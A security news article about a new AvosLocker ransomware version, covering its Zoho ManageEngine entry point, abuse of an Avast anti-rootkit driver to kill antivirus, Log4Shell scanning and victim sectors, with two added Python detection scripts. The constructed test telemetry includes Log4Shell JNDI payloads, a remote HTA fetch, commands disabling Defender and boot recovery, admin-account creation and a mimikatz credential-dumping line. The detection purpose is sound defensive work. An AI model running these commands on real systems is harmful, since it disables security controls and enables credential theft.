AvosLocker ransomware manages to avoid detection and disable AV tools

A new version of the ransomware abuses a legitimate anti-rootkit driver to disable AV tools and scans the network for Log4Shell

AvosLocker ransomware uses new tricks. Financially motivated gangs adopt new methods to evade AV detection.

Researchers have discovered and reported a new version of the AvosLocker ransomware that disables anti-malware solutions and evades detection once a system is infected. The threat actors take advantage of unpatched security flaws to get in.[1] The ransomware then abuses a legitimate anti-virus component to switch off detection and block security tools from running at all.[2]

AvosLocker exploits several vulnerabilities that victims have yet to patch in order to get into organizations' networks.

Previous versions of the AvosLocker ransomware[3] also used techniques of this kind to ensure persistence. However, this is the first sample observed disabling defense solutions by loading the legitimate Avast Anti-Rootkit driver file and abusing it to kill security processes. The ransomware also scans various places on the machine and on other endpoints for Log4Shell, the Log4j vulnerability. That flaw has made headlines since its disclosure in December 2021 because of how widely the library is deployed, the volume of exploitation attempts, and its severity rating.[4]
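A Log4Shell scan of the kind described above leaves JNDI lookup strings in the logs of whatever it probes, and a scanner (or a follow-on attacker) routinely obfuscates them with nested `${lower:...}` or `${::-x}` lookups, so a literal match on `${jndi:` misses most of them. The following is an added example, not code from the article or from the researchers it cites: it normalizes the nested lookups from the inside out and then matches, run over constructed Apache-style access-log lines (the IPs, timestamps and requests are invented for the example).

```python
"""Detect Log4Shell probe strings in HTTP access-log lines.

Added example; not code from the article. A literal search for "${jndi:"
misses obfuscated variants such as ${${lower:j}ndi:...} and
${${::-j}${::-n}${::-d}${::-i}:...}, so we emulate the Log4j 2 lookups that
are used for obfuscation, collapse them from the innermost one outwards, and
only then look for the jndi: lookup.
"""
import re

# Constructed sample log lines (not real traffic), Apache combined-style format.
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2022:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/May/2022:10:00:02 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://10.0.0.9:1389/a}"
10.0.0.9 - - [01/May/2022:10:00:03 +0000] "GET /api?x=${${lower:j}ndi:${lower:l}dap://10.0.0.9:1389/b} HTTP/1.1" 400 0 "-" "curl/7.68"
10.0.0.9 - - [01/May/2022:10:00:04 +0000] "GET /health HTTP/1.1" 200 2 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://10.0.0.9:1099/c}"
10.0.0.7 - - [01/May/2022:10:00:05 +0000] "GET /static/app.js HTTP/1.1" 200 9000 "-" "Mozilla/5.0 ${env:HOME}"
"""

# An innermost lookup: ${name:value} whose value contains no further "${".
_INNER = re.compile(r"\$\{([a-zA-Z]*):([^${}]*)\}")
# The fully de-obfuscated lookup we actually alert on: ${jndi:scheme://host...}
_JNDI = re.compile(r"\$\{jndi:\s*([a-zA-Z]+)://([^}/\s]+)", re.IGNORECASE)


def _resolve(name, value):
    """Emulate the Log4j 2 lookups most often used to hide 'jndi'."""
    name = name.lower()
    if name == "lower":
        return value.lower()
    if name == "upper":
        return value.upper()
    if name == "":
        # ${::-x} is the "empty lookup with default value x" form; it yields x.
        return value[2:] if value.startswith(":-") else value
    # Any other lookup (env, sys, date, ...) is not emulated; strip the
    # ${...} wrapper so the loop terminates but keep the text for context.
    return f"{name}:{value}"


def normalize(text, max_rounds=20):
    """Collapse nested non-jndi lookups from the inside out until none remain."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            name, value = m.group(1), m.group(2)
            if name.lower() == "jndi":
                return m.group(0)  # keep the jndi lookup itself for matching
            changed = True
            return _resolve(name, value)

        text = _INNER.sub(repl, text)
        if not changed:
            break
    return text


def naive_hits(log_text):
    """The literal-match approach, kept to show what it misses."""
    return [n for n, line in enumerate(log_text.splitlines(), 1)
            if "${jndi:" in line.lower()]


def scan_log(log_text):
    """Return (line_no, client_ip, scheme, target) for each line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        if not line.strip():
            continue
        client = line.split(" ", 1)[0]
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, client, m.group(1).lower(), m.group(2)))
    return hits


if __name__ == "__main__":
    print("literal match only:", naive_hits(SAMPLE_LOG))
    for hit in scan_log(SAMPLE_LOG):
        print("JNDI probe: line %d from %s -> %s://%s" % hit)
```

The literal search finds only the un-obfuscated line; the normalizing scanner finds all three probes and reports the callback host in each, which is the internal address a scanner like the one described would be listening on. The `${env:HOME}` line is a lookup but not a JNDI one and is correctly left alone.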

AvosLocker ransomware typically targets critical infrastructure in the US

This ransomware is one of the newer threats filling the space left by other ransomware groups that were shut down or ceased operating. It has been observed launching attacks against critical infrastructure in the United States. Targets include financial services, government facilities, and other organizations that can yield a profit for financially motivated criminals.

This ransomware-as-a-service has been operating since July 2021, when researchers first observed it. The newcomer to the ransomware scene arrived with new features: the group has since adopted double and triple extortion, using the data stolen during an infection as extra leverage. AvosLocker goes a step further by auctioning the stolen data if the targeted organizations refuse to pay the ransom.

Besides the US, the group targets victims in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the UK, Canada, China, and Taiwan.[5] According to the analysis, the main targeted sectors remain food and beverage, technology, finance, media, and telecom. Attacks were still being observed as of February 2022.

Leveraging an exploit for an RCE flaw

The entry point for these attacks is a remote code execution flaw such as the one in Zoho ManageEngine ADSelfService Plus. The bug is used to launch an HTML application (HTA) hosted on an attacker-controlled server. The HTA in turn runs a PowerShell script containing shellcode that connects back to the same attacker-run C&C server and executes further arbitrary commands.

The chain then retrieves the installer for the AnyDesk remote desktop software, which is used to deploy further tools for scanning the local network. Once security software has been disabled, the ransomware payload is dropped with little risk of detection. Other components scan for the Log4Shell remote code execution vulnerability and other flaws, and a mass-deployment tool delivers the malicious batch scripts to multiple endpoints.

These batch scripts disable Windows Update, Microsoft Defender, and Windows error recovery, leaving the machine without a way to boot into recovery and without running security products. The ransomware also creates new administrator accounts. Mimikatz and other malicious tools may be involved in these attacks too. However, the analysis shows that the attempt to kill antivirus products does not succeed every time, since other self-protection features on the device can block it.
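Every step of the chain described in this section (the HTA launching PowerShell, a driver loaded from somewhere other than the driver store, boot recovery and Defender or Windows Update being switched off, a fresh local account being added to Administrators, credential dumping) is visible in ordinary endpoint telemetry. The following is an added example, not code from the article or from the researchers it cites: a small rule set run over constructed Sysmon-style events (event ID 1 process creation, event ID 6 driver load). The field names follow Sysmon; the hosts, paths, IPs and file names are invented, and the specific command lines (bcdedit, sc, net, Set-MpPreference) are my assumptions about how the described effects are usually achieved on Windows, not strings quoted by the article.

```python
"""Detection rules for the post-exploitation behaviour described in the article.

Added example; not code from the article. Events are constructed to resemble
Sysmon output: eid 1 = process create (Image, ParentImage, CommandLine),
eid 6 = driver loaded (ImageLoaded, Signed). Command lines below are the
usual ways of producing the effects the article describes, not quotes from it.
"""
import re
from collections import defaultdict

EVENTS = [  # constructed sample telemetry, not real data
    {"seq": 1, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\ManageEngine\jre\bin\java.exe",
     "CommandLine": "mshta.exe http://198.51.100.23/a.hta"},
    {"seq": 2, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc ZQBjAGgAbwAgAGgAaQA="},
    {"seq": 3, "eid": 6, "host": "ws01", "ImageLoaded": r"C:\ProgramData\Tools\driver.sys", "Signed": "true"},
    {"seq": 4, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c bcdedit /set {default} recoveryenabled No"},
    {"seq": 5, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\sc.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "sc stop WinDefend"},
    {"seq": 6, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"seq": 7, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\net.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net user svc_backup P@ssw0rd! /add"},
    {"seq": 8, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\net.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "net localgroup administrators svc_backup /add"},
    {"seq": 9, "eid": 1, "host": "ws01", "Image": r"C:\Users\Public\mk.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mk.exe privilege::debug sekurlsa::logonpasswords exit"},
    # Benign noise that must not alert.
    {"seq": 10, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe", "CommandLine": "svchost.exe -k netsvcs"},
    {"seq": 11, "eid": 1, "host": "ws01", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe Get-Process"},
]

DRIVER_DIRS = (r"c:\windows\system32\drivers", r"c:\windows\system32\driverstore")


def _cl(ev):
    return ev.get("CommandLine", "").lower()


def _base(path):
    return path.rsplit("\\", 1)[-1].lower()


# Stateless rules: each takes one event and returns a truthy value on a match.
RULES = {
    "hta_spawns_powershell": lambda ev: ev["eid"] == 1
        and _base(ev.get("ParentImage", "")) == "mshta.exe"
        and _base(ev["Image"]) in ("powershell.exe", "pwsh.exe"),
    # Bring-your-own-driver: a signed driver loaded from outside the driver store.
    "driver_loaded_outside_driverstore": lambda ev: ev["eid"] == 6
        and ev.get("Signed", "").lower() == "true"
        and not ev["ImageLoaded"].lower().startswith(DRIVER_DIRS),
    "boot_recovery_disabled": lambda ev: ev["eid"] == 1 and "bcdedit" in _cl(ev)
        and re.search(r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures", _cl(ev)),
    "defender_or_update_tampering": lambda ev: ev["eid"] == 1 and re.search(
        r"(sc(\.exe)?\s+(stop|config)|net(\.exe)?\s+stop)\s+(windefend|wuauserv)"
        r"|disablerealtimemonitoring\s+\$?true", _cl(ev)),
    "credential_dumping_cmdline": lambda ev: ev["eid"] == 1
        and "sekurlsa::logonpasswords" in _cl(ev),
}

# Stateful rule: account created, then added to Administrators, on the same host.
_USER_ADD = re.compile(r"net1?(\.exe)?\s+user\s+(\S+)(?:\s+\S+)?\s+/add")
_ADMIN_ADD = re.compile(r"net1?(\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add")


def evaluate(events):
    """Return a list of (seq, rule_name) alerts in event order."""
    alerts = []
    new_users = defaultdict(set)  # host -> accounts created in this batch
    for ev in sorted(events, key=lambda e: e["seq"]):
        for name, rule in RULES.items():
            if rule(ev):
                alerts.append((ev["seq"], name))
        if ev["eid"] == 1:
            m = _USER_ADD.search(_cl(ev))
            if m:
                new_users[ev["host"]].add(m.group(2))
            m = _ADMIN_ADD.search(_cl(ev))
            if m and m.group(2) in new_users[ev["host"]]:
                alerts.append((ev["seq"], "new_local_admin_account"))
    return alerts


if __name__ == "__main__":
    for seq, rule in evaluate(EVENTS):
        print(f"event {seq}: {rule}")
```

Two of the rules deserve a caveat that matches the article's own: a `sc stop WinDefend` attempt is worth alerting on even though it usually fails, because Defender's tamper protection is exactly the "self-protection feature" that makes the kill attempt unreliable, and the attempt itself is the signal. The driver rule keys on the load path rather than on the driver's signature, since the whole point of the technique is that the signature is valid.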

About the author
Gabriel E. Hall

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
